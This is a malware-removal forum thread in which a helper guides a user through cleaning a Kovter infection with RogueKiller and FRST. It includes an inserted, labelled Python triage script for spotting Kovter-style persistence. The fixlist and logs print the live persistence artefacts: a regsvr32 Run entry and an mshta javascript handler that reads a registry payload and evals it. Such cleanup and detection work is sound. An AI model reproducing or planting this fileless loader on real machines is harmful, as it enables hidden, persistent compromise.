
Very persistent Kovter variant / fileless / semi-fileless malware


17 replies to this topic

#1 Windfarm

Windfarm

  • Members
  • 9 posts

Posted 22 May 2017 - 07:55 AM

Greetings,

 

After several years of safe internet practices, I must have gotten complacent or careless, because MS security essentials popped up telling me I was infected with numerous trojans, of which Kovter was one.

 

Numerous attempts to self-treat were only partially successful, as each time the machine is restarted the malicious files are re-installed, (...appdata/local/Ektion/(randomname).lnk, ...Windows/temp/(randomname).exe, etc.), and startup entries try to launch.  Listed below are the malware scans I've run, and their result. 

 

My uneducated guess is this malware is "file-less", or nearly so, and full removal may require manually modifying the registry, putting it well above my ability level to solve.  I will not make any more attempts to diagnose or treat the infection until told to do so.

 

1. MS security essentials: initial detection.  Ran full scan, removed all items.  Currently running in background.

2. MWBAM: Ran full scan, found infection again, removed all items.

3. RKill: Ran.

4. Hitman Pro: Ran full scan, found infection again, removed all items.

5. Zemana: Ran full scan, found infection again, removed all items.  Currently running in background.

6. Appguard: Installed as last resort to buy time to address issue.  Currently running in background.

 

I greatly appreciate any help you can provide.  Thank you very much.

 

 





#2 satchfan

satchfan

  • Malware Response Team
  • 2,785 posts
  • Gender:Female
  • Location:Devon, UK

Posted 22 May 2017 - 10:40 AM

Hello Windfarm and welcome to the Bleeping Computer forum.

My name is Satchfan and I would be glad to help you with your computer problem.

Please read the following guidelines which will help to make cleaning your machine easier:

  • please follow all instructions in the order posted
  • please continue to review my answers until I tell you your machine appears to be clear. Absence of symptoms does not mean that everything is clear
  • all logs/reports, etc. must be posted in Notepad. Please ensure that word wrap is unchecked. In Notepad click Format, uncheck Word wrap if it is checked
  • if you don't understand something, please don't hesitate to ask for clarification before proceeding
  • the fixes are specific to your problem and should only be used for this issue on this machine.
  • please reply within 3 days. If you do not reply within this period I will post a reminder but topics with no reply in 4 days will be closed!

IMPORTANT:

Please DO NOT install/uninstall any programs unless asked to.
Please DO NOT run any scans other than those requested

===================================================

Note: Please run these in the order given in the instructions.

===================================================

Download and run AdwCleaner

Download AdwCleaner from here and save it to your desktop.


  • run AdwCleaner by clicking on Scan
  • when it has finished, leave everything that was found checked, (ticked), then click on Clean
  • if it asks to reboot, allow the reboot
  • on reboot a log will be produced; please attach the content of the log to your next reply.

===================================================

Run RogueKiller

IMPORTANT: Please remove any usb or external drives from the computer before you run this scan!

Close all running programs.


Download RogueKiller to your desktop

  • close all running programs
  • for Windows Vista/Seven, right click -> run as administrator, for XP simply double-click on RogueKiller.exe
  • when the pre-scan is finished, click on Scan
  • click on Report and copy/paste the content in your next post
  • NOTE: DO NOT attempt to remove anything that the scan detects – everything that is reported is not necessarily bad

If the program is blocked, continue to try it several times. If it still doesn’t work, (it could happen), rename it to winlogon.exe.

Please post the contents of the RKreport.txt in your next reply.

===================================================

Run Farbar Recovery Scan Tool

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • press Scan button
  • it will produce a log called Frst.txt in the same directory the tool is run from
  • please copy and paste log back here.
  • the first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the Frst.txt into your reply.

Logs to include with next post:

AdwCleaner log
RKreport.txt
Frst.txt
Addition.txt


Thanks

Satchfan

 


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.


#3 Windfarm

Windfarm
  • Topic Starter

  • Members
  • 9 posts

Posted 22 May 2017 - 11:25 AM

Thank you very much for the quick reply, Satchfan.  Quick question: would you prefer the logs attached to, or copied/pasted within the body of my next reply?

 

Thanks.



#4 Windfarm

Windfarm
  • Topic Starter

  • Members
  • 9 posts

Posted 22 May 2017 - 01:09 PM

Satchfan,

 

The requested log files are attached.

 

Thank you.

 

Attached File  AdwCleaner log.txt   1.83KB   3 downloads

 

Attached File  RKreport.txt   6.54KB   2 downloads

 

Attached File  FRST.txt   100.64KB   1 downloads

 

Attached File  Addition.txt   47.02KB   1 downloads



#5 satchfan

satchfan

  • Malware Response Team
  • 2,785 posts
  • Gender:Female
  • Location:Devon, UK

Posted 22 May 2017 - 04:24 PM

Thank you for the logs. In future, please copy/paste them into the reply - thanks.

I can see from your logs that you have Combofix on your computer. This is an extremely powerful tool which should only be used when instructed to do so by someone who has been properly trained. ComboFix is intended by its creator to be "used under the guidance and supervision of an expert", NOT for private use. Using this tool incorrectly could lead to disastrous problems with your operating system such as preventing it from ever starting again.

I’ll give you instructions on uninstalling it when your computer is clean.

Let's clear up what was found so far.

================================================

Please uninstall Kaspersky Security Scan and any other Kaspersky products

================================================

Run RogueKiller

IMPORTANT: Do not reboot your computer if at all possible otherwise the malware will reactivate and you will have to run RogueKiller again

  • close all programs
  • double-click RogueKiller.exe - Windows 7/8/10: right-click the program and select Run as Administrator
  • after it has completed its prescan, click on Scan
  • when the scan is finished press the Delete button and post the log it produces.

Please then run it again and send the new log.

================================================

Run Farbar Recovery Scan Tool

Open notepad. Please copy the contents of the code box below and paste it into Notepad.

CloseProcesses:
HKU\S-1-5-21-956152210-3627048645-3905910164-1000\...\Run: [YWPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Admin\AppData\Local\Ektion\zgkbubwn.dll <===== ATTENTION
GroupPolicy: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-956152210-3627048645-3905910164-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
S4 LMIRfsClientNP; no ImagePath
S3 ALSysIO; \??\C:\Users\Admin\AppData\Local\Temp\ALSysIO64.sys [X] <==== ATTENTION
S3 catchme; \??\C:\ComboFix\catchme.sys [X]    
S3 cpuz135; \??\C:\Windows\TEMP\cpuz135\cpuz135_x64.sys [X]
S2 LMIInfo; \??\C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2017-05-21 17:49 - 2017-05-21 17:49 - 00120320 _____ C:\Users\Mcx1-PC\AppData\Local\GDIPFONTCACHEV1.DAT
2017-05-20 18:34 - 2017-05-20 18:34 - 02744744 _____ (Symantec Corporation) C:\Users\Administrator\Desktop\FixTool64.exe
Task: {29005687-7EC2-40C4-A8A1-B05976B729C8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {5990F873-AE8F-4020-A269-C4E117F5D2A9} - \Microsoft\Windows\Setup\gwx\runappraiser -> No File <==== ATTENTION
Task: {64C1B86A-666E-4648-A56C-BBF88902E3E1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {BC6FE6F9-C856-41F3-928D-603D34094AC2} - System32\Tasks\{08CA944D-EAE2-4743-A38C-A34D2605F607} => pcalua.exe -a C:\Users\Admin\AppData\Local\Temp\jre-8u51-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATTENTION
AlternateDataStreams: C:\Users\Admin\Cookies:nM6UdAqXZyq51ts55IZYj1ZqUqCq5 [2302]
AlternateDataStreams: C:\Users\Admin\Cookies:xbDQxNXdcIhlabyq6nrvbNA [2320]
AlternateDataStreams: C:\ProgramData\Microsoft:3k2TJ6LTDO4zhWY7BOFUdEJXC [2404]
AlternateDataStreams: C:\ProgramData\Microsoft:BuJtUrpdimfQQW4sRIuH [2282]
AlternateDataStreams: C:\ProgramData\Microsoft:kQsCR3MW3YwHkIIAmhlFxJp89xB [2222]
AlternateDataStreams: C:\ProgramData\Microsoft:LQG3MvKXbbetZEkdKRI4Wb [2384]
AlternateDataStreams: C:\ProgramData\Microsoft:mWfaJWGxRXC3y8dM9eDw8QjbBc [2284]
AlternateDataStreams: C:\ProgramData\TEMP:054203E4 [149]
HKU\.DEFAULT\Software\Classes\dca127: "C:\Windows\system32\mshta.exe" "javascript:AlVEO0W="iGY0hFQ";r0p=new ActiveXObject("WScript.Shell");hNS1G="3OC";GC5aA=r0p.RegRead("HKCU\\software\\efypohco\\gusikgprg");pQeHF4h="m7WJc";eval(GC5aA);gD3MPS="TbD";" <===== ATTENTION
C:\Users\Admin\AppData\Local\Ektion
C:\Users\Admin\AppData\Local\Temp\ALSysIO64.sys
C:\Users\Admin\AppData\Local\Temp\jre-8u51-windows-au.exe -d
EmptyTemp:

NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

  • save the file as fixlist.txt in the same folder as FRST – NOTE: It's important that both files, FRST and fixlist.txt, are in the same location or the fix will not work
  • run FRST64 then click Fix just once and wait
  • it will create a log on your desktop, (Fixlog.txt); please post it to your reply.

Logs to include with next post:

RK fix log
New RKreport.txt
Fixlog.txt


Thanks

Satchfan

 


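The fixlist above shows the whole Kovter persistence chain in one place: the YWPack Run value that has regsvr32.exe load zgkbubwn.dll out of AppData\Local\Ektion, the Classes\dca127 handler that launches mshta.exe with inline javascript which RegReads HKCU\software\efypohco\gusikgprg and eval()s it (the fileless stage), the unnamed alternate data streams under ProgramData and the user's Cookies folder, and the gwx tasks whose target files are gone. The Python below is an added triage example, not part of this thread and not an FRST or Adlice tool: it flags those four patterns in FRST-style lines so a helper can pick them out of a 100 KB FRST.txt quickly. The sample lines are copied from the fixlist, except the ExampleTray Run entry, which is constructed as a benign control; it also treats rundll32 like regsvr32, which goes slightly beyond what this log shows.

```python
"""Triage helper for FRST-style fixlist/scan lines (added example, see lead-in)."""
import re
from dataclasses import dataclass

# Constructed sample: lines copied from the fixlist posted above, plus one
# constructed benign Run entry (ExampleTray) that the filter should ignore.
SAMPLE_LINES = r"""
HKU\S-1-5-21-956152210-3627048645-3905910164-1000\...\Run: [YWPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Admin\AppData\Local\Ektion\zgkbubwn.dll <===== ATTENTION
HKLM\...\Run: [ExampleTray] => C:\Program Files\Example\tray.exe
HKU\.DEFAULT\Software\Classes\dca127: "C:\Windows\system32\mshta.exe" "javascript:AlVEO0W="iGY0hFQ";r0p=new ActiveXObject("WScript.Shell");hNS1G="3OC";GC5aA=r0p.RegRead("HKCU\\software\\efypohco\\gusikgprg");pQeHF4h="m7WJc";eval(GC5aA);gD3MPS="TbD";" <===== ATTENTION
AlternateDataStreams: C:\ProgramData\Microsoft:3k2TJ6LTDO4zhWY7BOFUdEJXC [2404]
Task: {29005687-7EC2-40C4-A8A1-B05976B729C8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
""".strip().splitlines()

# FRST appends "<===== ATTENTION" to lines it considers suspicious; strip it off.
ATTN = r"(?: <=+ ATTENTION)?$"
RUN_RE = re.compile(r"^(?P<key>HK\S*\\Run): \[(?P<name>[^\]]+)\] => (?P<cmd>.*?)" + ATTN)
CLASSES_RE = re.compile(r"^(?P<key>HK\S*\\Classes\\[^:]+): (?P<cmd>.*?)" + ATTN)
ADS_RE = re.compile(r"^AlternateDataStreams: (?P<path>[A-Za-z]:\\[^:]*):(?P<stream>\S+) \[(?P<size>\d+)\]$")
TASK_RE = re.compile(r"^Task: \{(?P<id>[0-9A-Fa-f-]+)\} - (?P<path>\S+) -> No File")

# Script/host binaries that legitimately exist but are abused to load code, and
# the user-writable locations that malware drops into (compared in lower case).
LOLBINS = ("regsvr32", "rundll32")
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")


@dataclass
class Finding:
    technique: str  # what the line indicates
    detail: str     # the concrete artefact (path, stream, registry value, task id)
    line: str       # the original log line, for the report


def _run_finding(m):
    """Run value whose command is a host binary loading code from a user-writable path."""
    cmd = m.group("cmd")
    low = cmd.lower()
    if any(b in low for b in LOLBINS) and any(p in low for p in USER_WRITABLE):
        return Finding("Run value loads code from a user-writable path via a host binary",
                       f'{m.group("name")} -> {cmd}', m.string)
    return None


def _classes_finding(m):
    """File-class handler that runs mshta javascript which reads a registry value and evals it."""
    cmd = m.group("cmd")
    low = cmd.lower()
    if "mshta" in low and "javascript:" in low and "regread(" in low and "eval(" in low:
        rr = re.search(r'RegRead\("([^"]+)"\)', cmd)
        # the path is a javascript string literal, so backslashes are doubled in the log
        target = rr.group(1).replace("\\\\", "\\") if rr else "(RegRead target not parsed)"
        return Finding("file-class handler runs mshta javascript that evals a registry-stored payload",
                       f'{m.group("key")} reads {target}', m.string)
    return None


def _ads_finding(m):
    """Any alternate data stream except the browser mark-of-the-web is worth a look."""
    if m.group("stream").lower() == "zone.identifier":
        return None
    return Finding("alternate data stream hidden on a file or folder",
                   f'{m.group("path")}:{m.group("stream")} ({m.group("size")} bytes)', m.string)


def _task_finding(m):
    """Scheduled task registration whose target file no longer exists."""
    return Finding("scheduled task whose target file is missing",
                   f'{{{m.group("id")}}} {m.group("path")}', m.string)


MATCHERS = ((RUN_RE, _run_finding), (CLASSES_RE, _classes_finding),
            (ADS_RE, _ads_finding), (TASK_RE, _task_finding))


def triage(lines):
    """Return a Finding for every line that matches one of the persistence patterns."""
    findings = []
    for raw in lines:
        line = raw.strip()
        for regex, handler in MATCHERS:
            m = regex.match(line)
            if m:
                found = handler(m)
                if found:
                    findings.append(found)
                break
    return findings


def summarize(findings):
    """Count findings per technique so the report reads as a checklist."""
    counts = {}
    for f in findings:
        counts[f.technique] = counts.get(f.technique, 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"[{f.technique}]\n    {f.detail}")
```

Feed it the whole FRST.txt (for example `triage(open("FRST.txt", encoding="utf-8", errors="replace"))`) and the hits line up with the entries satchfan put into the fixlist; the benign ExampleTray entry produces nothing.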


#6 Windfarm

Windfarm
  • Topic Starter

  • Members
  • 9 posts

Posted 22 May 2017 - 06:08 PM

Thank you Satchfan.  Kaspersky utility and updater uninstalled, logs attached.

 

RKfixlog.txt:

Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Admin [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Delete -- Date : 05/22/2017 16:42:11 (Duration : 00:11:42)

¤¤¤ Processes : 1 ¤¤¤
[VT.Unknown] TorGuardService.exe(2956) -- C:\Program Files\TorGuard.Viscosity\TorGuardService.exe[7] -> Found

¤¤¤ Registry : 8 ¤¤¤
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-956152210-3627048645-3905910164-1000\Software\Microsoft\Windows\CurrentVersion\Run | YWPack : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Admin\AppData\Local\Ektion\zgkbubwn.dll [x] -> Deleted
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-956152210-3627048645-3905910164-1000\Software\Microsoft\Windows\CurrentVersion\Run | YWPack : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Admin\AppData\Local\Ektion\zgkbubwn.dll [x] -> ERROR [2]
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-956152210-3627048645-3905910164-1000\Software\Microsoft\Internet Explorer\Main | Start Page :
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-956152210-3627048645-3905910164-1000\Software\Microsoft\Internet Explorer\Main | Start Page :
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{7947F786-94CF-435B-BBB0-68A8A0880EB6} | DhcpNameServer : 10.9.0.1 10.8.0.1 ([][])  -> Replaced ()
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{7947F786-94CF-435B-BBB0-68A8A0880EB6} | DhcpNameServer : 10.9.0.1 10.8.0.1 ([][])  -> Replaced ()
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-956152210-3627048645-3905910164-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Replaced (1)
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-956152210-3627048645-3905910164-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Replaced (1)

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: Samsung SSD 840 PRO Seri +++++
--- User ---
[MBR] 97871e56c789aaaee1f000289cdae1e0
[BSP] 67e04b63423c8c70142e5ac10665cc29 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 244096 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: Samsung SSD 840 Series +++++
--- User ---
[MBR] 40da082b95aec55a5d51749f8ab8943d
[BSP] c609717eb0e4772a5dd00bcbc6648423 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 238473 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

 

New RKreport.txt:

RogueKiller V12.10.10.0 (x64) [May 22 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Admin [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 05/22/2017 16:58:55 (Duration : 00:11:36)

¤¤¤ Processes : 1 ¤¤¤
[VT.Unknown] TorGuardService.exe(2956) -- C:\Program Files\TorGuard.Viscosity\TorGuardService.exe[7] -> Found

¤¤¤ Registry : 0 ¤¤¤

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: Samsung SSD 840 PRO Seri +++++
--- User ---
[MBR] 97871e56c789aaaee1f000289cdae1e0
[BSP] 67e04b63423c8c70142e5ac10665cc29 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 244096 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: Samsung SSD 840 Series +++++
--- User ---
[MBR] 40da082b95aec55a5d51749f8ab8943d
[BSP] c609717eb0e4772a5dd00bcbc6648423 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 238473 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

Fixlog.txt:

Fix result of Farbar Recovery Scan Tool (x64) Version: 20-05-2017
Ran by Admin (22-05-2017 17:20:46) Run:1
Running from C:\Users\Admin\Desktop
Loaded Profiles: Admin (Available Profiles: Admin & Mcx1-PC & Administrator)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
HKU\S-1-5-21-956152210-3627048645-3905910164-1000\...\Run: [YWPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Admin\AppData\Local\Ektion\zgkbubwn.dll <===== ATTENTION
GroupPolicy: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-956152210-3627048645-3905910164-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
S4 LMIRfsClientNP; no ImagePath
S3 ALSysIO; \??\C:\Users\Admin\AppData\Local\Temp\ALSysIO64.sys [X] <==== ATTENTION
S3 catchme; \??\C:\ComboFix\catchme.sys [X]    
S3 cpuz135; \??\C:\Windows\TEMP\cpuz135\cpuz135_x64.sys [X]
S2 LMIInfo; \??\C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2017-05-21 17:49 - 2017-05-21 17:49 - 00120320 _____ C:\Users\Mcx1-PC\AppData\Local\GDIPFONTCACHEV1.DAT
2017-05-20 18:34 - 2017-05-20 18:34 - 02744744 _____ (Symantec Corporation) C:\Users\Administrator\Desktop\FixTool64.exe
Task: {29005687-7EC2-40C4-A8A1-B05976B729C8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {5990F873-AE8F-4020-A269-C4E117F5D2A9} - \Microsoft\Windows\Setup\gwx\runappraiser -> No File <==== ATTENTION
Task: {64C1B86A-666E-4648-A56C-BBF88902E3E1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {BC6FE6F9-C856-41F3-928D-603D34094AC2} - System32\Tasks\{08CA944D-EAE2-4743-A38C-A34D2605F607} => pcalua.exe -a C:\Users\Admin\AppData\Local\Temp\jre-8u51-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATTENTION
AlternateDataStreams: C:\Users\Admin\Cookies:nM6UdAqXZyq51ts55IZYj1ZqUqCq5 [2302]
AlternateDataStreams: C:\Users\Admin\Cookies:xbDQxNXdcIhlabyq6nrvbNA [2320]
AlternateDataStreams: C:\ProgramData\Microsoft:3k2TJ6LTDO4zhWY7BOFUdEJXC [2404]
AlternateDataStreams: C:\ProgramData\Microsoft:BuJtUrpdimfQQW4sRIuH [2282]
AlternateDataStreams: C:\ProgramData\Microsoft:kQsCR3MW3YwHkIIAmhlFxJp89xB [2222]
AlternateDataStreams: C:\ProgramData\Microsoft:LQG3MvKXbbetZEkdKRI4Wb [2384]
AlternateDataStreams: C:\ProgramData\Microsoft:mWfaJWGxRXC3y8dM9eDw8QjbBc [2284]
AlternateDataStreams: C:\ProgramData\TEMP:054203E4 [149]
HKU\.DEFAULT\Software\Classes\dca127: "C:\Windows\system32\mshta.exe" "javascript:AlVEO0W="iGY0hFQ";r0p=new ActiveXObject("WScript.Shell");hNS1G="3OC";GC5aA=r0p.RegRead("HKCU\\software\\efypohco\\gusikgprg");pQeHF4h="m7WJc";eval(GC5aA);gD3MPS="TbD";" <===== ATTENTION
C:\Users\Admin\AppData\Local\Ektion
C:\Users\Admin\AppData\Local\Temp\ALSysIO64.sys
C:\Users\Admin\AppData\Local\Temp\jre-8u51-windows-au.exe -d
EmptyTemp:
*****************

Processes closed successfully.
HKU\S-1-5-21-956152210-3627048645-3905910164-1000\Software\Microsoft\Windows\CurrentVersion\Run\\YWPack => value not found.
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKU\S-1-5-21-956152210-3627048645-3905910164-1000\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKLM\System\CurrentControlSet\Services\LMIRfsClientNP => key removed successfully
LMIRfsClientNP => service removed successfully
HKLM\System\CurrentControlSet\Services\ALSysIO => key removed successfully
ALSysIO => service removed successfully
HKLM\System\CurrentControlSet\Services\catchme => key removed successfully
catchme => service removed successfully
HKLM\System\CurrentControlSet\Services\cpuz135 => key removed successfully
cpuz135 => service removed successfully
HKLM\System\CurrentControlSet\Services\LMIInfo => key removed successfully
LMIInfo => service removed successfully
HKLM\System\CurrentControlSet\Services\VGPU => key removed successfully
VGPU => service removed successfully
C:\Users\Mcx1-PC\AppData\Local\GDIPFONTCACHEV1.DAT => moved successfully
C:\Users\Administrator\Desktop\FixTool64.exe => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{29005687-7EC2-40C4-A8A1-B05976B729C8} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{29005687-7EC2-40C4-A8A1-B05976B729C8} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5990F873-AE8F-4020-A269-C4E117F5D2A9} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5990F873-AE8F-4020-A269-C4E117F5D2A9} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\runappraiser => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{64C1B86A-666E-4648-A56C-BBF88902E3E1} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{64C1B86A-666E-4648-A56C-BBF88902E3E1} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BC6FE6F9-C856-41F3-928D-603D34094AC2} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BC6FE6F9-C856-41F3-928D-603D34094AC2} => key removed successfully
C:\Windows\System32\Tasks\{08CA944D-EAE2-4743-A38C-A34D2605F607} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{08CA944D-EAE2-4743-A38C-A34D2605F607} => key removed successfully
C:\Users\Admin\Cookies => ":nM6UdAqXZyq51ts55IZYj1ZqUqCq5" ADS removed successfully.
C:\Users\Admin\Cookies => ":xbDQxNXdcIhlabyq6nrvbNA" ADS removed successfully.
C:\ProgramData\Microsoft => ":3k2TJ6LTDO4zhWY7BOFUdEJXC" ADS removed successfully.
C:\ProgramData\Microsoft => ":BuJtUrpdimfQQW4sRIuH" ADS removed successfully.
C:\ProgramData\Microsoft => ":kQsCR3MW3YwHkIIAmhlFxJp89xB" ADS removed successfully.
C:\ProgramData\Microsoft => ":LQG3MvKXbbetZEkdKRI4Wb" ADS removed successfully.
C:\ProgramData\Microsoft => ":mWfaJWGxRXC3y8dM9eDw8QjbBc" ADS removed successfully.
C:\ProgramData\TEMP => ":054203E4" ADS removed successfully.
HKU\.DEFAULT\Software\Classes\dca127 => key removed successfully
C:\Users\Admin\AppData\Local\Ektion => moved successfully
"C:\Users\Admin\AppData\Local\Temp\ALSysIO64.sys" => not found.
"C:\Users\Admin\AppData\Local\Temp\jre-8u51-windows-au.exe -d" => not found.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 10936458 B
Java, Flash, Steam htmlcache => 198604174 B
Windows/system/drivers => 18448420 B
Edge => 0 B
Chrome => 121288626 B
Firefox => 51703027 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 153331 B
systemprofile32 => 37277536 B
LocalService => 132244 B
NetworkService => 73842 B
Admin => 64168842 B
UpdatusUser => 0 B
UpdatusUser => 0 B
LogMeInRemoteUser => 0 B
Mcx1-PC => 306786 B
Administrator => 476428 B

RecycleBin => 134280327 B
EmptyTemp: => 616.3 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 17:20:56 ====

 

 

 

 




#7 satchfan

satchfan

  • Malware Response Team
  • 2,785 posts
  • Gender:Female
  • Location:Devon, UK

Posted 23 May 2017 - 06:29 AM

That looks better.

Run Malwarebytes Anti-Malware

Please download and run the installer for Malwarebytes 3.0.

  • follow the prompts to install the program, (Malwarebytes 3.0 will automatically upgrade Malwarebytes Anti-Malware 2.x to Malwarebytes 3.0)
  • at the end, be sure a checkmark is placed next to the following
    • Launch Malwarebytes Anti-Malware
    • a 14 day trial of the Premium features is pre-selected: deselect this if you don’t want it, (it won’t diminish the scanning and removal capabilities of the program).
  • click Finish.
  • on the Dashboard, click Update Now
  • after the update completes, click the Scan Now button.
  • if an update is available, clicking the Update Now button will update it
  • a Threat Scan will begin.
  • when the scan is complete, if malware has been detected, click Apply Actions to allow MBAM to clean what was found
  • when the prompt to restart the computer appears, click Yes.
  • after the restart once you are back at your desktop, open MBAM once more
  • click on the 'History' tab, then 'Application Logs'
  • double-click on the scan log which shows the date and time of the scan just performed.
  • click Copy to Clipboard
  • please paste the contents of the clipboard into your reply.

Can you tell me how things are now.

Satchfan

 




#8 Windfarm

Windfarm
  • Topic Starter

  • Members
  • 9 posts

